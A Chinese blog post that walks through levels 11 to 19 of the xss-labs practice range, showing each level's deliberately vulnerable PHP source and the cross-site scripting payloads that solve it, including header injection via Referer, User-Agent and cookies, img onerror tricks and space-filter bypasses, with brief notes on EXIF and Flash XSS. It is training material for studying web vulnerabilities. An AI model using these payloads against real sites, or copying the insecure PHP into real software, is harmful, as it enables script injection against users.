xss挑战之旅11-19关

最新推荐文章于 2023-03-10 21:21:10 发布
最新推荐文章于 2023-03-10 21:21:10 发布
阅读量1.2k 收藏 6
点赞数 1
分类专栏: web安全 文章标签: xss php 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127812077
版权

文章目录

前言

靶场:XSS挑战之旅
1-10关
11-20关

第11关:referer

  1. 查看网页源代码
    在这里插入图片描述

  2. 抓包
    在这里插入图片描述

  3. 修改,放包

    Referer: 111" onclick="alert(1)" type="text

    在这里插入图片描述

  4. 浏览器效果
    在这里插入图片描述

  5. 下一关
    在这里插入图片描述

  6. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];
	$str00 = $_GET["t_sort"];
	$str11=$_SERVER['HTTP_REFERER'];  //可传入的参数,可能需要抓包才能修改
	$str22=str_replace(">","",$str11);
	$str33=str_replace("<","",$str22);
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
	<form id=search>
	<input name="t_link"  value="'.'" type="hidden">
	<input name="t_history"  value="'.'" type="hidden">
	<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">  
	<input name="t_ref"  value="'.$str33.'" type="hidden">  //注入点
	</form>
	</center>';
?>
第12关:User-Agent

  1. 看源码,跟user-agent有关
    在这里插入图片描述

  2. 抓包修改

    User-Agent: 111" onclick="alert(1)" type="

    在这里插入图片描述

  3. 查看网页源代码,点击输入框即可通关
    在这里插入图片描述

  4. 源码

    <?php 
	......
	$str11=$_SERVER['HTTP_USER_AGENT']; //注入点
	$str22=str_replace(">","",$str11);
	$str33=str_replace("<","",$str22);
	......
	<input name="t_ua"  value="'.$str33.'" type="hidden">  //能浏览器加载的地方
	......
?>
第13关:cookie

  1. 看网页源代码,跟cookie有关
    在这里插入图片描述

  2. 浏览器新建cookie(或者抓包修改也可以)

    user: 111" onclick="alert(1)" type="

    在这里插入图片描述

  3. 刷新加载
    在这里插入图片描述

  4. 源码

    <?php 
	setcookie("user", "call me maybe?", time()+3600);
	......
	$str11=$_COOKIE["user"]; //注入点
	......
	<input name="t_cook"  value="'.$str33.'" type="hidden">
	......
?>
第14关:exif xss

  1. emmm,这关需要自己找环境复现。
    在这里插入图片描述

  2. exif xss介绍

    exif

    可交换图像文件格式(英语:Exchangeable image file format,官方简称Exif),是专门为数码相机的照片设定的文件格式,可以记录数码照片的属性信息和拍摄数据。

    exif xss 原理

    因为有些网站可以读取exif 信息,当传入一张含有恶意信息的图片的时候,就可以触发恶意代码。

  3. 制作恶意图片
    截图不行,无法写入
    在这里插入图片描述
    这张图片时手机拍的,可以写入
    在这里插入图片描述

  4. 可以读取exif信息的网址

    https://www.sojson.com/image/exif.html

    在这里插入图片描述

    https://exifdata.com/

    在这里插入图片描述

第15关:ng-include

  1. ng-include函数

    可以在html文件中包含外部的html文件

    特别注意:

    ng-include,如果单纯指定地址,必须要加引号'
    ng-include,加载外部html,script标签中的内容不执行
    ng-include,加载外部html,含有style标签样式可以识别

  2. 改变参数,观测效果
    在这里插入图片描述

  3. 文件包含进来了,使用',看特别注意1
    在这里插入图片描述
    在这里插入图片描述

  4. 为什么包含php文件也可以?

    应该是把php文件执行后生成的html文件包含进来的。

  5. 加入参数进行测试,有回显
    在这里插入图片描述

  6. 传入<script>alert(1)</script>进行测试,但是不执行,看特别注意2

    ?src='level1.php?name=<script>alert(1)</script>'

    在这里插入图片描述

  7. 传入<img src=1 onerror=alert(1)>进行测试,看特别注意3,进入下一关

    ?src='level1.php?name=<img src=1 onerror=alert(1)>'

    在这里插入图片描述

  8. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["src"];
	echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
第16关

  1. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = strtolower($_GET["keyword"]);  //小写,注入点
	$str2=str_replace("script","&nbsp;",$str);  //将script替换为&nbsp;  不使用script即可
	$str3=str_replace(" ","&nbsp;",$str2);  //将空格替换为&nbsp;   用%0a代替
	$str4=str_replace("/","&nbsp;",$str3);  //将/替换为&nbsp;   可以用单标签进行绕过
	$str5=str_replace("	","&nbsp;",$str4);  //将空格替换为&nbsp;
	echo "<center>".$str5."</center>";  //浏览器加载注入代码
?>

  2. 测试,观测浏览器加载效果和网页源代码
    在这里插入图片描述

  3. payload

    <img src=1 onerror=alert(1)>
<img src=1 onclick=alert(1)>
----------------------------------
用%0a替换空格
<img%0asrc=1%0aonerror=alert(1)>
<img%0asrc=1%0aonclick=alert(1)>

  4. onerror事件

    onerror 事件在加载外部文件(文档或图像)发生错误时触发。
    在img 这个标签无法正常执行的时候触发,所以这里的src 我们随便填一个不存在的地址,就可以触发后面的弹窗了。

  5. 下一关
    在这里插入图片描述

第17关

  1. 源码

    <body>
	<h1 align=center>欢迎来到level17</h1>
		<?php
		ini_set("display_errors", 0);
		echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
		?>
	<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>

  2. 测试
    在这里插入图片描述

  3. <embed>标签

    引入一个swf文件到浏览器端,并且它的src属性值没有添加引号,所以不用闭合,可以利用。

  4. 传入<script>alert(1)</script>进行测试
    在这里插入图片描述

  5. 传入onclick=alert(1)进行测试
    在这里插入图片描述

  6. 进行测试
    在这里插入图片描述

  7. onclick=alert(1)不行,用onmouseover=alert(1)
    在这里插入图片描述

  8. 下一关
    在这里插入图片描述

第18关
  1. 同17关,虽然不支持插件,但是不影响
    在这里插入图片描述
第19关:flash xss

  1. 供参考已复现成功的文章
    XSS-labs Level 19 Flash XSS
    XSS之xss-labs-level19

  2. 本人的尝试失败,以下经验仅供参考

  3. flash xss 原理

    flash有可以调用js的函数,也就是可以和js进行通信。使用flash的这些函数时,如果传入恶意XSS代码,并调用js进行解析,此时会触发XSS攻击。因此这些函数如果使用不当也是会造成xss的。
    常见的可触发xss的危险函数有:getURL、navigateToURL、ExternalInterface.call、htmlText、loadMovie等等。

  4. 测试
    在这里插入图片描述

  5. 不能用"在这里插入图片描述

  6. 直接参考别人的payload在这里插入图片描述

  7. 用IE浏览器打开,自动跳转成Microsoft edge,修改设置
    在这里插入图片描述

  8. IE浏览器访问,但是浏览器自动禁止了XSS
    在这里插入图片描述

  9. 没了

c4fx
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss labs 挑战
lemonwei
06-05 779
没事重新从xss的源码分析一下形成和利用 xss挑战进入一,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
XSS-labs Level 19 Flash XSS
baynk的博客
11-23 3584
level 19 flash xss 查看前端代码,发现访问swf的时候在传参 接下来直接访问这个链接。 这里可以看到flash里面提示sifr.js是没有定义的,这不仅仅是个图片。。。 需要对flash进行反编译查看源码,使用的是jpexs,没想到有一天我也会干这样的事了,羞耻啊。。。 通过sifr找到了对应的脚本位置,比较长,就一点点说明过程了。 在此脚本中找到了flash显示的信息,...
XSSxss-labs-level19
Hugu
02-24 1078
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页或访问该页面中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码
XSS挑战赛(xsslabs)11~16解析
黄乔国PHP
03-07 671
总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。
XSS挑战卡讲解
hanjunhao2002的博客
03-10 108
首先他将“”变为了",而且还将scrpt和on等语句之间加入了下划线,怎么解决呢,。其实,我们可以直接输入javascript:alert(1),将script用实体编号绕过。也可以对script的一个字母进行实体编号。完成!
xss挑战level1-level4,操作步骤配截图
qq_56424902的博客
03-07 276
xss挑战level1-level4,操作步骤配截图。 查看源代码发现弹窗直接属于语句令其弹窗 (2)提前闭合 (3)与第二题一样value提前闭合 (4)与第二题一样 ...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
xss挑战
11-09
这个是XSS文件,解压后放在服务器的对应文件夹即可。 闯笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
最新发布
04-07
PDF-XSS实例文件
xss测试语句大全--5000条
03-24
xss测试语句---5000条
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs
CN天狼
03-20 210
xss-lab xss flash xss
XSS学习笔记:XSS Challenges 1-19通全详解
闵行小鱼塘
10-07 5935
通过 XSS Challenges 平台学习下XSS,共19
xss-challenge(挑战1~13)
weixin_55404107的博客
10-21 314
好。
Xss挑战-WriteUp(前13)
m0_46394638的博客
11-03 351
Xss挑战-WriteUp(前13) 作为荒废已久的小菜鸡恰巧这几天比较有时间,想重新整理一下XSS的笔记,于是找到搭建的xss实验靶场,重新练练手。顺手写下自己的一个解题思路,当做笔记总结。WriteUp如有错误或有更好的办法,还请大佬指教! 另附XSS挑战靶场源码下载链接:https://pan.baidu.com/s/1Lw-jGb5TMddPWY8lFAn8yw 提取码:rtrg 测试字符:<'"{()}> 第一 上测试字符,查看源码。看一下字符过滤情况,...
靶场通-XSS挑战(1-5)
m0_56634355的博客
06-04 1393
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一的源码......
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1326
xss挑战前十
xss挑战学习笔记
weixin_44300286的博客
06-07 448
前言:前几天学了xss攻击,觉得有必要写一篇博客记录一下。
XSS挑战 解题记录
kynehc
09-06 6030
本文记录xss挑战解题,检验自己的xss技术 题目链接 Level1 链接为http://test.xss.tv/level1.php?name=test 页面没有输入点 直接构造payloadname=alert(1) Level2 一样简单,给出payload">alert(1) Level3 过滤了尖括号 故用`’ onclick=alert(1)// Level4
XSS-Lab第十
07-27
XSS-Lab的第十是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一都有不同的XSS注入漏洞。在第十中,与上一不同的是会加入地址的检查。具体来说,该会检查输入的数据中是否包含"http://"字段。因此,为了通过这一,我们需要在输入的字段中加入该字段,例如输入"java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://')"。这样,当受害者访问该页面时,恶意代码会在其浏览器上执行,从而成功通过第十。 #### 引用[.reference_title] - *1* *2* *3* [XSS攻击-xss-lab(1-10)详细讲解](https://blog.csdn.net/qq_43395215/article/details/105955004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值